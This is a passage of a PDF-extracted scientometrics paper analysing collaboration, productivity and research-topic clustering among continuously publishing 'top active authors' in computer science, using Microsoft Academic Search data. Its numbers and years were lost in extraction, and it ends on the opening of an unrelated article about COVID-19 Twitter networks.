and characterize these clusters in terms of the major subdomains they are working on. such analysis will show us the research topic trend in computer science. considering the fact that the data for the earlier and the most recent years are less complete, we take the data in the -year window [ , ] for our analysis in this paper. note that although orduña-malea et al. ( ) pointed out the limitation of the the data from mas was lastly collected on july , . data from mas, which includes the decreasing update rate and incomplete indexation of all papers recently, the limitation and misleading information lies mostly in the data starting from , as the authors indicated. therefore, we believe the data in the time window we focus on is relatively reliable, and will not affect the validity of our results. we also filter out paper records without publication year or author information for this study. table presents a general description of our dataset. the more detailed evolution of the dataset is shown in fig. , where we plot the annual number of active authors and papers each year in the time window [ , ]. the rapid expansion of the computer science field can be observed clearly. results comparing top active authors and average authors in this section, we analyze and compare the collaboration levels and patterns of top active authors versus average authors, as well as their productivity. we take one active window as wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure number of active authors and papers each year in the time window [ , ]. an example, and show the detailed comparison across different years in that window. since results in other active windows are similar, we then show brief results across different active windows, instead of the detailed comparison in each active window. top active authors ioannidis, boyack & klavans ( ) defined “ucp authors” by considering a specific window of years, from to , and observed that there are about % such authors. for our purposes, we define the top active authors based on the ucp metric. for each year to be used as the start of a window, we find the top % authors in terms of the length of uninterrupted and continuous presence from that starting year. this gives rise to an active window size for top active authors for each year. for example, starting from year , the active window size needs to be set as (which means the ending year of that active window is ), in order to make the percentage of top active authors among authors with at least one publication in that window around %. smaller window size will lead to a higher percentage than % while larger window size will lead to a lower percentage. for clarity, we show an example of top active author versus non-top active author in the active window [ , ] in fig. , where their annual number of publications during that period is plotted. with this definition, it is observed that the active window size required to be counted as a top active author is different for each starting year. in fact, this active window size is growing steadily over the years, as shown in fig. . this certainly correlates well with our impression that the top authors are becoming more and more active. the number of years required to become a top active author starting from is around , which is a little less than that found in ioannidis, boyack & klavans ( ). this is not too surprising considering the research field and dataset studied are both different. but the result is in the same ball park. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure example of top active author versus non-top active author in the active window [ , ]. figure change of active window size. comparison on collaboration we first compare the collaboration patterns of top active authors with that of average authors. top active authors is the author set including all top active authors in an active window, while “average authors” is the author set including any author with at least one publication in an active window. so average authors is a superset of top active authors. we take the active year window [ , ] for comparison. we compare the nature and extent of collaboration, such as the size of coauthors set, collaboration strength and team connectivity, and then the productivity. we will show the brief comparison results across different active windows later. one important measure for the extent of collaboration of an author, obviously, is the size of the coauthors set. figure shows the average number of coauthors per author for top active authors and average authors on an annual basis. here the coauthors include top active coauthors and non-top active coauthors. the figure shows that top active authors wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of coauthors set size between top active authors and average authors. generally have more coauthors than average authors. moreover, the top active authors also have a significantly higher increase rate of coauthors, although more collaboration is the trend for the whole community (o’brien, ; wuchty, jones & uzzi, ). a likely reason for the much higher number of coauthors for top active authors is directly due to “team science” and the growth in team size. as the collaboration pattern in a team is often hierarchical, and the top active authors are more likely at the root of the hierarchy, they would naturally have more collaborators and benefit from growth of team sizes. if we assumed the coauthor network is built by preferential attachment (lee et al., ), we would reach the same conclusion for top active authors. to further understand the collaboration pattern by top active authors, we also show the coauthors set size of the same set of top active authors during their pre top-active period and post top-active period for ten years in fig. . it is clear that even before and after their top-active period, top active authors tend to have more coauthors. the difference between top active authors and average authors in the ten years before their top-active period is not so much as that in later periods. but there still exists slight advantage to top active authors. this indicates that in order to become top active authors, it is important for authors to build and expand their research teams in the very beginning. the further growth of the number of coauthors in the post top-active window is likely due to the reputation and connections they accumulated during their top-active period. in a social network, while the number of friends may show the size of one’s social connections, the length of the friendship one keeps with others can better reflect the extent of one’s influence in his social network. similarly, in the study of research collaboration, we can also use the collaboration length between one and his coauthors to represent one’s influence in his research community. again we compare top active authors with average authors using the active window [ , ]. figure a shows the distribution of collaboration length in the -year active window for top active authors and average authors. we observe that for both top active authors and average authors, more than half of the collaboration links exist for only one year, which shows the dominance of wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of collaboration length between top active authors and average authors. (a) is the distribution of collaboration length. (b) is the distribution of one-year link. table analysis on connected components. statistical measurement top active author average author #nodes in network , , #links in network , , #connected components , #nodes in giant component , , short-term research teams. however, top active authors are more likely to have longer collaboration relationship with others. this indicates that although top active authors have a rapid expansion rate of coauthors, there still exist some stable collaboration links. for the transient links which last for only one year, the distribution of the year in which the one-year collaboration happens is plotted in fig. b. while it is almost uniformly distributed in the years for top active authors, it is left skewed for average authors. top active authors keep a regular proportion of transient collaboration links, while the average authors have more short-term collaboration links in recent years, which may be the result of rapid increase of paper publishing over years. next, we analyze the structure of the coauthor networks built in the -year window by top active authors and average authors respectively. here the coauthor network of top active authors contains the collaboration between top active authors only and the average author coauthor network consists of all the authors with publications in the specific time window. for simplicity, we have removed authors with no coauthors (single nodes only) in the two networks. the result is shown in table , where we focus on the analysis of connected components in the two networks. the number of connected components is a lower bound to the estimated number of clusters in the coauthor network. it reflects the connectivity in the network as a whole. as shown by table , top active authors are more connected with each other while for average authors, small teams are more popular. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of productivity for top active authors and average authors. (a) is the comparison of ip. (b) is the comparison of cp. comparison on productivity besides the collaboration patterns, a more direct assessment of an author’s activity in the community is productivity, which is often reflected by the annual publication rate of an author. before going to the detailed discussion of productivity, we define two notations first: individual productivity (ip) and community productivity (cp). ip is the annual number of claimed papers per author. thus ip is incremented for an author every time his name appears in a paper. cp, on the other hand, is based on the fractional contribution of each coauthor towards a paper (equal division assumed). cp counts each paper only once, while ip counts each paper n times when there are n coauthors. figure shows the comparison of ip and cp for top active authors and average authors. similar to the comparison of coauthors, we also include productivity behaviors in the ten years before and after the top-active period. for the comparison of ip, we can see that ip almost doubles in the years for average authors, while it is much more than doubled for top active authors. this can be partially explained by the different coauthors set sizes of top active authors and average authors. different from cp, the contribution of coauthors can help increase one’s ip. we can see in fig. that while the annual number of coauthors for average authors increases from to in the years, it increases from to for top active authors in the same period. such a rapid expansion of collaboration thus inevitably leads to more productivity for top active authors. for cp, there is a slight decreasing trend for average authors, whereas for top active authors, the trend is increasing over the years. this shows that although the top active authors are consistently increasing their productivity, whether measured by ip or cp, the productivity (cp) of the average authors are actually decreasing. this phenomenon was also observed and discussed in the context of team science (wuchty, jones & uzzi, ). comparison across different active windows now we show the brief comparison results between top active authors and average authors across different active windows. as previously, we do the comparison on collaboration and productivity. for collaboration, the average annual number of coauthors per author wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of coauthors set size between top active authors and average authors across different active windows. in each active window starting from different years is plotted in fig. . the calculation is as follows: for each targeted author, we count his number of active years and number of distinct coauthors in one active window (that means if a coauthor collaborates multiple times with the targeted author in an active window, we only count him once.). with the two numbers, we obtain his annual number of coauthors in the active window. then we do average on the targeted author set, and get the comparison result between top active authors and average authors. from fig. we see that in the earlier windows, there is not much difference between top active authors and average authors, they have coauthors with almost the same scale. however later, top active authors show great advantage over average authors in attracting coauthors. we see that in the last active window starting from , the average annual number of coauthors per author is almost doubled for top active authors than average authors. for productivity, we also do the comparison on ip and cp. the comparison result is shown in fig. , where we plot the average annual number of papers per author in each active window starting from different years. the calculation is similar to the previous calculation for coauthors. we see that for ip, while average authors behave consistently over different active windows, top active authors show a rapidly increasing trend. for cp, while average authors show a decreasing tendency, top active authors are still able to achieve increasing productivity, although the increase rate is not that large when compared to the ip case. in summary, the comparison results between top active authors and average authors across different active windows are consistent with our previous findings in one active window. the analysis and comparison of top active authors and average authors, on both collaboration and productivity, give us further insights into the trend of team research. top active authors are able to achieve more sustained research activity, much higher level of research output, and accelerated growth in research output. this may be partially explained by their ability to build research teams, as well as to form extensive research wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of productivity for top active authors and average authors across different active windows. (a) is the comparison of ip. (b) is the comparison of cp. collaboration with a broader range of other authors including top active authors. in this regard, the top active authors might be treated as the core of the research community. collaboration among top active authors from our analysis above, top active authors can be considered as the core of their academic community. their collaboration and communication plays a significant role in knowledge diffusion and research development in academia. and the evolution of their collaboration patterns also reflect the research trend in the whole community. therefore, we take an analysis on the collaborations among those top active authors in this section. for the study of top active author collaboration, two important aspects of the collabo- ration network is its topology and tie strength. while network topology demonstrates the way top active authors link with each other, tie strength indicates the closeness of the linked top active authors. our focus for this study is thus the relationship between the tie strength and network topology of the coauthor network of top active authors. previous studies on this have shown different results. granovetter ( ) and onnela et al. ( ) have already shown that in ordinary social networks, members usually communicate more frequently with other ones in the same community. therefore in the communication network built by community members, if we define the tie strength in the network by their communication frequency, we can find that stronger ties exist mostly inside a community, while ties between different communities are usually weaker. however, in coauthor networks, it is shown in pan & saramäki ( ) and ke & ahn ( ) that on the contrary, the tie strength is usually much weaker among authors in the same community than authors in different communities. then as the core of the academic community, for top active authors, what will be the case in their coauthor network? before we take a detailed analysis on this, we first give formal definitions on the measurement of tie strength between coauthors and network topology. following the practice of newman ( ), we define tie strength, i.e., collaboration link weight between wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. author i and one of his coauthor j by wij =  p np − , ( ) where p is the set of papers that author i and j have coauthored, and np is the number of authors of paper p. therefore, for the coauthor network of top active authors, wij is calculated based on all the coauthored papers by two top active authors in an active window. note that the definition of the collaboration link weight here considers not only the collaboration length between two top active coauthors, but also their collaboration frequency. for the network topology, we focus on the measurement of the similarity of two coauthors’ neighborhood, which may reflect whether two coauthors are in the same community or not. so we define the neighborhood similarity of author i and author j by oij = nij di − + dj − − nij , ( ) where di is the node degree of author i, dj is the node degree of author j, and nij is the number of common neighbors of author i and author j in the coauthor network (onnela et al., ) of top active authors. thus oij reflects the link overlap of two top active coauthors. after the introduction of the above definitions, we then do analysis on the coauthor network of top active authors. we take two sets of top active authors in the active windows [ , ] and [ , ] respectively, and study the evolution by comparing the difference between them. as with the previous analysis, we build the two coauthor networks based on the existence of collaboration links between top active authors in each window respectively. note, for these two networks only the top active authors in the respective time windows are included. the top active authors without any coauthors (hence singleton nodes) are removed, and the top active coauthor pairs with no other neighbors (in which case the denominator for oij is ) are also removed. figure shows the relationship between the link overlap and tie strength of the two coauthor networks respectively. we see that the coauthor network of top active authors presents a pattern in between the patterns in ordinary social network and general coauthor network respectively. on one hand, a similar trend as the ordinary social network is displayed (right hand side part of figs. a and b). for links with large weight, the link overlap is also relatively large. this shows the general trend when doing research that many authors will collaborate when they study similar topics. on the other hand, there are author pairs in the same community but seldom collaborating (left hand side of figs. a and b). those authors might be research leaders working on the same specific topic. each of them has many coauthors in the same area, but they do not collaborate often directly, since they need to compete with each other in order to get resources and support for their own research. therefore, although they might have large overlap of coauthors, they do not collaborate wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure relationship between link overlap and link weight in the two active windows. we use log- arithmic binning for wij and choose the median value of oij in a bin. (a) is the result in [ , ] window. (b) is the result in [ , ] window. figure the relative size of the remaining giant component as a function of the fraction of removed links in the two active windows. (a) is the result in [ , ] window. (b) is the result in [ , ] window. much directly. there are also author pairs with very small link overlap but relatively large link weight (the middle part of figs. a and b). this indicates the collaboration between different communities, thus the interdisciplinary research trend in computer science. to confirm our conclusions above, we also do analysis on the giant component of each coauthor network of top active authors. we remove links one by one from the giant component based on the link weight, either in decreasing order or increasing order, and keep track of the size of the remaining giant component as a function of the fraction of removed links. the result is shown in fig. . we see that in general, the giant component shrinks faster when the stronger links are removed first, which indicates that links are stronger between different communities. this phenomenon is similar to the case in general coauthor network, but they have quite different implications. for the general coauthor network, the weaker connection inside a community is due to the junior students in a research group (pan & saramäki, ), while for the coauthor network of top active authors, since each node represents a senior researcher, the relatively weaker connection wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of clustering results in the two active windows. (a) is the result in [ , ] window. (b) is the result in [ , ] window. inside a community is due to their competition in the same topic, and the stronger connection between different communities is due to the collaboration in interdisciplinary topics. besides, by comparing fig. a with fig. b, we find that the gap between the two shrinking curves are becoming larger, and the giant component is also becoming more resistent to the removal of links. in fig. b, most of the nodes still exist in the giant component even when half of the links are removed. the larger gap implies more strong connections and less weak connections between communities, which again shows the interdisciplinary research trend. the better resistance to link removal means that inside the same community, there are more links with the strongest/weakest connections. it indicates on one hand the collaboration of senior authors in the same topics, on the other hand the fierce competition among research leaders on similar topics. topic trend based on top active author collaboration based on the leadership status of top active authors in their academic community, we can also get a sense of what have been the hot topics in the community, by observing the evolution of the research topics the top active authors work on. for this study, we still take the two sets of top active authors in the active windows [ , ] and [ , ] respectively, and compare the differences between them. as with the previous analysis, we first build the two coauthor networks based on the existence of collaboration links between top active authors in each window respectively, and remove the top active authors without any coauthors, as they will not be part of any clusters anyway. we then apply the clauset–newman–moore algorithm (clauset, newman & moore, ) to do clustering for the two coauthor networks. this algorithm is based on the optimization of the network modularity, which measures when the clustering is a good one, in the sense that there are many edges within clusters and only a few between them. figure shows the clustering result for the two windows. different clusters are put in different grids, with blue nodes representing top active authors in clusters. the grey lines between nodes in different grids represent the collaboration relationships wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure major subdomain of top active authors in the two active windows. (a) is the result in [ , ] window. (b) is the result in [ , ] window. among different clusters. we can see that in the earlier window, the clusters are more fragmented. the smallest cluster contains only two authors (the minimum possible size). the connections (represented by the number of links) between different clusters are not strong. our interpretation is that in the earlier years, researchers tended to work more in isolation or with small scale (e.g., thesis mentor-mentee type of ) collaboration, with little cross teams collaboration. the period [ , ] is also before the advent of www, which might be attributed as an important factor of increased research collaboration. in the second window [ , ], however, four largest clusters with similar sizes emerged and seemed to dominate all the other clusters in size. moreover, many more collaboration links exist between different clusters. this indicates that computer science as a research field had become more interdisciplinary (at least within its field) with much more extensive collaboration among its researchers, which has been shown in previous analysis. since our clustering is conducted based on the existence of collaboration links, and through the publications of each top active author we extract their major research subdomains, we can visualize research as the mixing (or collaboration) of ideas from different research subdomains. for the years in the first window of time, a few research subdomains are the focus of research then, and many other research ideas were emerging and small research subdomains were just being formed. this is manifested by the large number of research clusters, the minimal collaboration between these clusters, and each cluster hosting a relatively homogeneous group of researchers. this is illustrated in fig. a, where each node still represents a top active author, with a color representing the major research subdomain of that author (if an author publishes in multiple subdomains, then the major subdomain is the one most of that author’s publications during the top active period belong to.). by the second window of years, a large number of top active authors belong to the four major clusters with heavy intra-cluster collaboration, with a relatively small fraction of top active authors still working in smaller clusters. furthermore, wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the four clusters are no longer so homogeneous, with a more mixed set of colors, as shown in fig. b. again, each node corresponds to a top active author, with a color representing the major subdomain that top active author works in, during the respective time window. by now, you must be curious about what the large clusters in each of these two windows are. we show the answers in figs. a and b for these two time windows. for each cluster, we show its composition in terms of the distribution of its researchers from the subdomains of our metadata. for the earlier time window [ , ], the top three we use subdomain name “computer science” to represent papers belonging to computer science, but not catego- rized into any subdomain. clusters are made up of mostly ( ) “algorithms and theory” people, ( ) “databases” people, and ( ) “programming language” people respectively. by the second time window, the top four dominating clusters are each hosting a more mixed set of top active authors, with the dominating subdomains being, respectively ( ) “algorithms and theory” and a set of application or technology areas, including “networks and communications”, “security and privacy”, “computer vision”, “graphics” etc. ( ) “databases” and “artificial intelligence” and some application or technology areas, including “networks and communications”, “human computer interactions”, “data mining” etc. ( ) “hardware and architecture”, “software engineering” and “distributed and parallel computing”, which may all be considered to be related to computing systems. ( ) “artificial intelligence”, “machine learning and pattern recognition”, “multimedia”, “natural language and speech”, and “networks and communications”, which may all be considered to belong to multimedia technology, applications and systems. these large clusters seem to map to the hot research areas and focus in computer science during those time periods. from fig. b, since there are more mixing of different subdomains in forming large clusters, we can also get a sense which subdomains tend to mix (collaborate) with others, and which subdomains tend to mix with each other. it seems “networks and communications”, perhaps playing an infrastructure or glue role, tend to mix with others the most. “artificial intelligence” seems to mix mostly with “machine learning” and “databases”, which perhaps represent the “thinking” and “memory” aspects of artificial intelligence. finally, it is also clear that the trend is for more and more interdisciplinary research, rather than for people in each subdomain working alone, which corroborates with previous findings. discussion our study is only based on publication and coauthorship data, so it is not possible to make meaningful assessment of research impact. a useful future direction is to incorporate the study of the research impact, based on whatever reliable measures for that, of top active authors and non-top active authors. this will help us further understand how good research results are achieved in the era of team research. nonetheless, the insights from our study should still be helpful to policy makers in academia. for example, different wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure subdomain distribution in the two active windows. (a) is the result in [ , ] window. (b) is the result in [ , ] window. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. evaluation frameworks may be used for different types of authors to get proper assessment of the different roles in team research. by serving as the core of the community, and as leaders of research teams, the top active authors tend to easily build up his/her academic output quantitatively, compared to less active authors and newcomers. it is necessary to take into account of the different roles, to help better assess the individual contributions, and give proper recognition. besides, considering the evolution of different research topics in the community, we might have some mainstream topics which attract much attention from the community, just as the large clusters observed above. however, we may also have some topics which are relatively cold and studied only by a small group of authors. it is natural that funding institutions might tend to support research proposals on mainstream topics. however, the study on some cold topics should also not be ignored. they need to find a balance between the research topics studied by different scales of authors. and it is the governors’ responsibility to make efficient resource allocations on different research topics based on their evolution patterns. the evolution of research topics and the clustering of these topics may also have some interesting implications. on the one hand, it is encouraging to see more and more collaboration between authors leading to increasingly more interdisciplinary research, which, arguably leads to better research. on the other hand, it may also be the manifestation of the tendency by researcher to pursue hot topics, which is a less risky approach in a very competitive research environment. the policy makers may consider the proper balance between the convergence and diversity of researchers. nowadays, there are plenty of research funding encouraging research collaboration, not only between departments within a university, but across universities in a region, and also internationally, which is consistent with the trend of increased collaboration we observe. the nature of inter-team collaboration is worth further studies. on the one hand, it is possible that collaboration is mostly bringing together researchers of different backgrounds so they will complement each other. on the other hand, it is also possible that collaboration is bringing together teams working on the same topics (forming larger teams), which may reduce competition. the situation is likely the combination of both cases. an in-depth study of the trend and effectiveness of such collaboration behavior will also help funding policy makers. despite the insights we get from our findings, we understand that there also exist some limitations in our dataset. as mentioned by orduña-malea et al. ( ), mas has incomplete indexation of papers in recent years, which may result in a relatively smaller coverage of mas than other popular bibliographic databases like isi web of science and scopus. but our focus in this paper is only the computer science field, not the general science research. and we only used data before , the year when the incomplete indexation problem began to appear in mas dataset (orduña-malea et al., ). with these restrictions, we think the data from mas is good enough. an important reason for using the mas data is that it comes with tagging of the papers by subdomains, which allows us to tag authors as well. this is a feature necessary for us to study the trend of wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. research topic clustering. the author name ambiguity problem is still a challenge to us. the mas data has gone through some editing to remove some name ambiguity problems. without involving authors to help correct ambiguity problems (as implemented by google scholar), the problem is not eliminated. however, in our study, since most analysis is at the statistical average level on different author sets, we believe the impact is not that severe. besides, for the topic trend study, since only major subdomains are considered, this will also remove some bias caused by duplicate records of authors. conclusion in this paper, we took an analysis on a new set of authors, i.e., top active authors, who have uninterrupted and continuous presence in the scientific literature over a period of time. thus top active authors may represent the most active researchers and serve as the core workforce in the community. we analyzed and compared the collaboration patterns and productivity of top active authors versus average authors in the computer science field. results show that top active authors are serving as the core of the research community and the study of top active authors can help us have a better understanding of the general trend of team research in the community. we also studied the research topic trends by analyzing the evolution of the coauthor network structure of top active authors and the detailed research topics the top active authors work on. results indicate that computer science, as a research field, is showing an increasing tendency for interdisciplinary research in the community. our conclusions not only show the general trends in doing research in the academic community, but also provides insights for policy researchers and policy makers in academia to develop better evaluation methods and doing more efficient resource management in system. our analysis is just an initial attempt for the understanding and visualization of the general trend in the academic ecosystem. for future work, analysis on datasets in other research fields can be conducted and more measurements besides the ones we focused on in this paper can also be proposed. theoretical analysis and modeling of the authors’ team research patterns are of interest as well. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • yan wu conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. • srinivasan venkatramanan and dah ming chiu conceived and designed the experi- ments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the data we used belongs to microsoft academic search and is available upon request from microsoft: http://datamarket.azure.com/dataset/mrc/microsoftacademic. another project that made the data available (upon request) is at: http://cse.iitkgp.ac.in/resgrp/ cnerg/. the latter source of data has been pre-processed for ease of use. references brookshear jg. . computer science: an overview. th edition. addison-wesley. pp. clauset a, newman me, moore c. . finding community structure in very large networks. physical review e ( ): doi . /physreve. . . gingras y, lariviere v, macaluso b, robitaille j-p. . the effects of aging on researchers’ publication and citation patterns. plos one ( ):e doi . /journal.pone. . granovetter ms. . the strength of weak ties. american journal of sociology ( ): – doi . / . huang j, zhuang z, li j, giles cl. . collaboration over time: characterizing and modeling network evolution. in: proceedings of the international conference on web search and data mining. acm, – . ioannidis jp, boyack kw, klavans r. . estimates of the continuously publishing core in the scientific workforce. plos one ( ):e doi . /journal.pone. . katz j. . geographical proximity and scientific collaboration. scientometrics ( ): – doi . /bf . katz js, martin br. . what is research collaboration? research policy ( ): – doi . /s - ( ) - . ke q, ahn y-y. . tie strength distribution in scientific collaboration networks. physical review e ( ): doi . /physreve. . . kunegis j, fay d, bauckhage c. . network growth and the spectral evolution model. in: proceedings of the th acm international conference on information and knowledge management. acm, – . lee s, bozeman b. . the impact of research collaboration on scientific productivity. social studies of science ( ): – doi . / . lee d, goh k-i, kahng b, kim d. . complete trails of coauthorship network evolution. physical review e ( ): . melin g. . pragmatism and self-organization: research collaboration on the individual level. research policy ( ): – doi . /s - ( ) - . newman me. . the structure of scientific collaboration networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . . o’brien tl. . change in academic coauthorship, – . science, technology & human values ( ): – doi . / . wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://datamarket.azure.com/dataset/mrc/microsoftacademic http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://cse.iitkgp.ac.in/resgrp/cnerg/ http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /pnas. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. onnela j-p, saramäki j, hyvönen j, szabó g, lazer d, kaski k, kertész j, barabási a-l. . structure and tie strengths in mobile communication networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . orduña-malea e, martı́n-martı́n a, m ayllon j, delgado lopez-cozar e. . the silent fading of an academic search engine: the case of microsoft academic search. online information review ( ): – doi . /oir- - - . pan rk, saramäki j. . the strength of strong ties in scientific collaboration networks. europhysics letters ( ): doi . / - / / . petersen am, riccaboni m, stanley he, pammolli f. . persistence and uncertainty in the academic career. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . uddin s, hossain l, rasmussen k. . network effects on scientific collaborations. plos one ( ):e doi . /journal.pone. . wagner cs, leydesdorff l. . network structure, self-organization, and the growth of international collaboration in science. research policy ( ): – doi . /j.respol. . . . wuchty s, jones bf, uzzi b. . the increasing dominance of teams in production of knowledge. science ( ): – doi . /science. . wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /oir- - - http://dx.doi.org/ . / - / / http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.respol. . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. research collaboration and topic trends in computer science based on top active authors introduction related work materials & methods results comparing top active authors and average authors collaboration among top active authors topic trend based on top active author collaboration discussion conclusion references © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) connections issue | vol. article | doi: . /connections- . covid- health communication networks on twitter: identifying sources, disseminators, and brokers ian kim* and thomas w. valente department of preventive medicine, keck school of 